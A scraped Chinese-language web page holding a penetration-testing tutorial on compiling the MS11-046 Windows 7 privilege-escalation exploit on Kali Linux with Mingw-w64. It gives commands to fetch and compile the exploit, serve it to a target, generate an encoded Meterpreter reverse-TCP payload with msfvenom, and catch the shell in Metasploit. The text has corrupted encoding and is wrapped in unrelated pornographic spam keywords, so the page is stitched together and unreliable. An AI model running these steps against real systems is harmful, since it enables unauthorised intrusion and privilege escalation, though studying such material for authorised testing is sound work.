国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

如何在Kali Linux上編譯Windows漏洞!

系統(tǒng) Linux Windows
Mingw-w64是一個(gè)用于創(chuàng)建Windows應(yīng)用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當(dāng)時(shí)不支持64位架構(gòu)。在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

Mingw-w64是一個(gè)用于創(chuàng)建Windows應(yīng)用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當(dāng)時(shí)不支持64位架構(gòu)。

在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

1、在Kali Linux上安裝Mingw-w64

默認(rèn)情況下,Kali Linux 2016.2和更低版本上未安裝Mingw-w64。 因此,我們需要先安裝它,然后才能在Linux上編譯Windows漏洞。 執(zhí)行以下命令,安裝Mingw-w64:

  1. apt-get update 
  2.  
  3. apt-get install mingw-w64    

 使用apt-get install mingw-w64在您的Kali主機(jī)上安裝mingw-w64。 

使用apt-get install mingw-w64在您的Kali主機(jī)上安裝mingw-w64。

鍵入y為yes,以確認(rèn)并繼續(xù)Mingw-w64安裝過(guò)程。 下載和安裝Mingw-w64可能需要一段時(shí)間才能完成。

2、無(wú)法找到程序包mingw-w64的解決方法

有時(shí),你嘗試安裝mingw-w64包時(shí)得到一個(gè)無(wú)法找到包mingw-w64的錯(cuò)誤,并得到類似如下提示:

  1. root@kali:~# apt-getinstall mingw-w64 
  2.  
  3. Reading package lists…Done 
  4.  
  5. Building dependency tree 
  6.  
  7. Reading stateinformation… Done 
  8.  
  9. E: Unable to locatepackage mingw-w64  

要解決這個(gè)問(wèn)題,請(qǐng)確保在sources.list文件中具有正確的存儲(chǔ)庫(kù)。您可以使用nano編輯文件:

/etc/apt/sources.list

確保您在此文件中具有正確的存儲(chǔ)庫(kù)。 您可以在以下頁(yè)面上找到不同版本的Kali Linux的存儲(chǔ)庫(kù):

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

使用sources.list文件中的正確的存儲(chǔ)庫(kù),您需要運(yùn)行apt-get update,然后再次運(yùn)行Mingw-w64軟件包的安裝命令。

3、用Mingw-w64交叉編譯Windows漏洞利用

現(xiàn)在我們已經(jīng)安裝了Mingw-w64,可以開始編譯Windows漏洞利用程序了。 對(duì)于本教程,我們將編譯一個(gè)用C編寫的Windows漏洞利用程序,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系統(tǒng)在輔助功能驅(qū)動(dòng)程序(AFD)中包含一個(gè)漏洞,允許已認(rèn)證的非管理用戶提升權(quán)限。即使Mingw-w64是為非常需要的64位支持開發(fā)的,我們也可以編譯32位Windows漏洞。 讓我們來(lái)看看如何編譯32位Windows漏洞。

讓我們從Exploit-db下載漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令編譯Windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令將編譯Windows 7 afd.sys特權(quán)升級(jí)漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32   

編譯Windows漏洞。 

編譯Windows漏洞。

要將漏洞利用程序轉(zhuǎn)移到目標(biāo)主機(jī),我們將使用內(nèi)置的ApacheWeb服務(wù)器來(lái)提供它。 最后2個(gè)命令會(huì)將exploit復(fù)制到Apache主目錄并啟動(dòng)Apache Web服務(wù)器。

當(dāng)我們從cmd.exe下載并執(zhí)行該漏洞時(shí),它將如下所示:  

漏洞利用成功執(zhí)行。 

漏洞利用成功執(zhí)行。

因?yàn)槲覀兛梢钥吹絯hoami命令在執(zhí)行exploit之前返回一個(gè)普通用戶權(quán)限,之后顯示是system用戶權(quán)限。這個(gè)exploit實(shí)際上在當(dāng)前shell中生成一個(gè)新的shell,而不是在新窗口中創(chuàng)建一個(gè)新的shell。這意味著我們也可以從命令行shell運(yùn)行此漏洞利用程序,例如Meterpreter。讓我們看看如何從Meterpreter會(huì)話運(yùn)行漏洞利用。

4、利用編譯錯(cuò)誤

當(dāng)編譯針對(duì)不同架構(gòu)和操作系統(tǒng)的漏洞時(shí),可能會(huì)發(fā)生許多錯(cuò)誤。有很多因素可能導(dǎo)致編譯失敗,例如:語(yǔ)法,庫(kù),主機(jī)和目標(biāo)體系結(jié)構(gòu),用于編譯代碼的已安裝軟件等等。一些錯(cuò)誤可能很容易修復(fù),有些錯(cuò)誤則不是。同樣重要的是不同的警告來(lái)自致命的錯(cuò)誤,因?yàn)榫婵赡苤皇侵甘疽恍╊愃频倪^(guò)時(shí)的功能,不能阻止漏洞的工作。致命錯(cuò)誤會(huì)阻止漏洞利用,因此需要修復(fù)。

處理編譯錯(cuò)誤的最佳方法是仔細(xì)閱讀,然后在Google上搜索解決方案。通常你不是第一個(gè)也不是唯一面對(duì)某個(gè)編譯錯(cuò)誤的人,因此沒(méi)有必要重新發(fā)明輪子。在線資源(如堆棧交換)通常為您提供最常見(jiàn)的編譯錯(cuò)誤的可能解決方案。

5、從Meterpreter shell中利用MS11-046

讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負(fù)載,并在目標(biāo)主機(jī)上執(zhí)行它。 我們將在Metasploit中使用多處理程序來(lái)捕獲反向shell。

使用以下命令使用Msfvenom創(chuàng)建有效負(fù)載:

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

請(qǐng)務(wù)必更換偵聽主機(jī)IP,必要時(shí)更換偵聽端口。現(xiàn)在啟動(dòng)msfconsole并運(yùn)行以下命令來(lái)設(shè)置多處理器漏洞:

  1. use exploit/multi/handler 
  2.  
  3. set lhost [listening host IP] 
  4.  
  5. set lport 4444 
  6.  
  7. run   

在端口4444上啟動(dòng)反向TCP處理程序。 

在端口4444上啟動(dòng)反向TCP處理程序。

然后下載利用程序到目標(biāo)主機(jī)并執(zhí)行它。 如果一切設(shè)置正確,您應(yīng)該在msfconsole上收到一個(gè)反向Meterpreter shell:  

目標(biāo)主機(jī)連接回Kali。 

目標(biāo)主機(jī)連接回Kali。

在Meterpreter命令行上運(yùn)行下一“shell”命令并運(yùn)行特權(quán)升級(jí)漏洞利用程序?qū)hell升級(jí)到系統(tǒng)shell:  

特權(quán)升級(jí)攻擊通過(guò)我們的Meterpreter會(huì)話成功執(zhí)行。 

特權(quán)升級(jí)攻擊通過(guò)我們的Meterpreter會(huì)話成功執(zhí)行。

正如你可以看到的,shell從特權(quán)測(cè)試用戶shell變化到系統(tǒng)shell。 請(qǐng)注意,在執(zhí)行它的shell中生成一個(gè)新的系統(tǒng)shell。 因此,我們不能看到利用輸出,因?yàn)樗窃谟邢薜奶貦?quán)的舊shell。

您可以通過(guò)鍵入Exit來(lái)驗(yàn)證這一點(diǎn),將退出系統(tǒng)shell并返回到仍包含Windows 7權(quán)限升級(jí)exploit輸出的用戶shell:  

特權(quán)用戶shell上的exploit輸出。 

特權(quán)用戶shell上的exploit輸出。

學(xué)到的東西

在本教程中,我們已經(jīng)了解了在Linux上針對(duì)Windows的交叉編譯漏洞的基礎(chǔ)知識(shí)。 我們已經(jīng)學(xué)習(xí)了如何在Kali Linux上安裝Mingw-w64并解決最常見(jiàn)的安裝問(wèn)題。 為了練習(xí)漏洞編譯過(guò)程,我們編譯了一個(gè)針對(duì)Windows7 x86的特權(quán)提升漏洞。 這也稱為交叉編譯。

我們已成功的在目標(biāo)主機(jī)上執(zhí)行已編譯的可執(zhí)行文件,并將shell從有限的用戶shell升級(jí)到系統(tǒng)shell。 我們已經(jīng)知道,這個(gè)特殊的exploit在shell中生成了一個(gè)shell,在這個(gè)shell中執(zhí)行了exploit。 這樣,我們還可以從命令行(例如Meterpreter shell)執(zhí)行特權(quán)提升漏洞利用。

最后但同樣重要的是,我們已經(jīng)了解了如何在編譯過(guò)程中修復(fù)錯(cuò)誤。

作為一個(gè)道德黑客和滲透測(cè)試者,建議咨詢資源,如堆棧交換,以搜索解決方案的編譯錯(cuò)誤。

責(zé)任編輯:龐桂玉 來(lái)源: 安云信息
相關(guān)推薦

2017-03-01 11:15:43

LinuxKali LinuxSSH服務(wù)

2011-08-04 15:55:50

Windows 編譯 Objective-

2017-09-18 10:05:15

WindowsLinux容器

2009-12-16 11:54:35

WindowsLinuxUnix

2021-09-21 15:31:05

Kali LinuxVMware安裝

2021-10-19 06:01:24

Chrome瀏覽器網(wǎng)頁(yè)瀏覽器

2021-09-27 13:16:24

LinuxWindows游戲

2013-01-04 17:16:15

2016-08-02 10:34:17

LinuxWindows雙啟動(dòng)

2016-09-21 08:54:33

2020-06-22 08:50:15

WindowsPython編程語(yǔ)言

2023-01-28 16:16:42

WindowsPython

2020-01-10 16:45:05

LinuxWindows 10USB

2019-09-29 09:40:20

LinuxWindowsMacOS

2020-10-19 16:40:18

LinuxWindows計(jì)算器

2017-02-16 13:33:54

2018-12-11 11:00:50

Linux字體命令

2020-04-21 14:21:31

LinuxPython

2021-10-12 08:43:19

LinuxSambaWindows

2021-10-02 10:10:47

LinuxBusyBox命令
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

97伦理在线四区| 人成网站免费观看| 秋霞国产精品| 亚洲免费三区一区二区| 7777奇米亚洲综合久久| 欧美性suv| 欧美色欧美亚洲高清在线视频| 亚洲v国产v| 精品一区二区三区的国产在线观看| 日韩久久免费av| 免费免费啪视频在线观看| 久久精品国产免费| 国产精品视频免费在线| 91看片一区| 欧美色视频日本版| 欧美爱爱视频免费看| 亚洲清纯自拍| 久久久在线视频| 1区2区3区在线| 懂色aⅴ精品一区二区三区蜜月| 青草网在线观看| 日韩午夜免费| 9.1国产丝袜在线观看 | 日韩在线中文| 中文字幕精品网| 超碰免费在线播放| 精品国产1区2区| 中文字幕国内自拍| 成人午夜高潮视频| 91成人在线网站| 亚洲精品久久久一区二区三区| 天堂av在线资源| 999国产精品999久久久久久| 影音先锋欧美精品| 任你弄在线视频免费观看| 日韩欧美中文在线| 色资源网在线观看| 亚洲色图网站| 国产z一区二区三区| 亚洲精品a区| www.久久撸.com| 中文字幕高清20页| 成人免费视频视频在线观看免费 | 成人日韩视频| 亚洲人成电影在线播放| 国产一区二区三区在线免费| 男人的天堂亚洲| 国产成人女人毛片视频在线| 不卡av一区二区| 精品一区二区三区在线观看视频| 国产精品天干天干在线综合| av一本久道久久波多野结衣| 精品日本12videosex| 久久久久久久久久久网站| 久久视频免费在线| 神马精品久久| 热久久天天拍国产| 亚洲综合久久av| 国产成人在线免费看| 激情久久一区二区| 亚洲午夜久久久久久久| 中文字幕在线看片| 国产亚洲成精品久久| 欧美性片在线观看| 欧美成人精品在线| 欧美一区二区三区红桃小说| 日本精品一区二区三区在线| 禁果av一区二区三区| 久久理论电影| 精品三级在线看| 国产精品电影| 亚洲人精选亚洲人成在线| 成人国产精品入口免费视频| 欧美日本高清一区| 日韩免费看片| 蜜桃网站成人| 国产精品小仙女| 午夜欧美福利视频| 亚洲已满18点击进入久久| 在线视频资源站| 欧美日韩久久久| 免费看av不卡| 日本欧美国产在线| 欧美色图亚洲自拍| 爽好多水快深点欧美视频| 不卡av在线播放| 色偷偷88888欧美精品久久久| 国产免费一区二区三区四在线播放| 欧美禁忌电影网| 亚洲精品ady| 91看片在线观看| 亚洲视频一二区| 91中文字幕在线观看| 国产黄色在线| 欧美日韩美女在线| 欧洲成人综合网| 日韩影片在线播放| 中文字幕一区二区三区四区不卡| 亚洲欧美中文字幕| 综合视频一区| aⅴ色国产欧美| 4444亚洲人成无码网在线观看| 久久毛片高清国产| 最近中文字幕在线中文视频| 日韩av在线播放资源| 欧美高清视频看片在线观看| 国产精品9999久久久久仙踪林| 国产一二精品视频| 日本国产高清不卡| 亚洲精品免费观看| 久久精品视频16| 福利视频一区二区| 欧美视频精品| 国产精品久久亚洲7777| 久久久777精品电影网影网| 国产高清美女一级毛片久久| 深夜福利一区二区| 欧美精品一区二区三区久久久竹菊| 美女av一区二区| 亚洲欧美文学| 欧美牲交a欧美牲交aⅴ免费下载| 日韩欧美极品在线观看| 欧美一级做一级爱a做片性| 国产精品国模大尺度私拍| 国产视频一区不卡| 免费男女羞羞的视频网站在线观看| 17婷婷久久www| 国产精品综合二区| 亚洲成人男人天堂| 久久九九全国免费精品观看| 99综合精品| 99热在线网站| 日韩在线视频导航| 亚洲国产裸拍裸体视频在线观看乱了中文 | 韩国成人一区| 亚洲欧美国产三级| 91p九色成人| 欧美日韩喷水| 欧美午夜xxx| 一区二区三区四区在线看| 福利视频免费在线观看| 欧美一级一级性生活免费录像| 成人亚洲一区二区| 欧美精品成人网| 在线精品视频视频中文字幕| 日韩精品一级中文字幕精品视频免费观看 | 欧美日韩一区不卡| 欧美a大片欧美片| 无码人妻少妇伦在线电影| 亚洲大胆人体在线| 123区在线| 国产精品美女久久久久av福利| 亚洲精品美国一| 中文字幕第12页| 久久久精品久久久久| 蜜桃av一区二区| av免费网站在线观看| 91亚洲精品视频| 无吗不卡中文字幕| 日韩欧美自拍| 青青草视频在线免费观看| 国产精品偷伦一区二区| 亚洲综合一二区| 成人精品天堂一区二区三区| 欧美xxxxxxxxx59| 国产精品九九久久久久久久| 亚洲人成网站在线| 精品香蕉视频| 亚洲1024| 亚洲一区二区免费| 日本韩国欧美三级| 日韩五码在线| 91麻豆精品国产自产在线观看一区 | 91久久精品国产性色| 欧美大片在线看免费观看| 91在线云播放| 亚洲精品影片| 自拍偷拍 国产| 69av成年福利视频| 国产精品美女一区二区三区| 国产精品115| 宅男午夜在线| 97影院在线午夜| 欧美精品日日鲁夜夜添| 亚洲黄色视屏| 岛国片av在线| 欧美日韩另类字幕中文| 久久成人精品视频| 国产精品高潮呻吟久久| 亚洲春色h网| 一个人看的www一区| 亚洲最大成人网色| 69堂精品视频| 91久久大香伊蕉在人线| 日韩视频在线你懂得| 亚洲午夜一区二区三区| 欧美一区午夜精品| 日本高清不卡在线| 国产精品字幕| 99热99精品|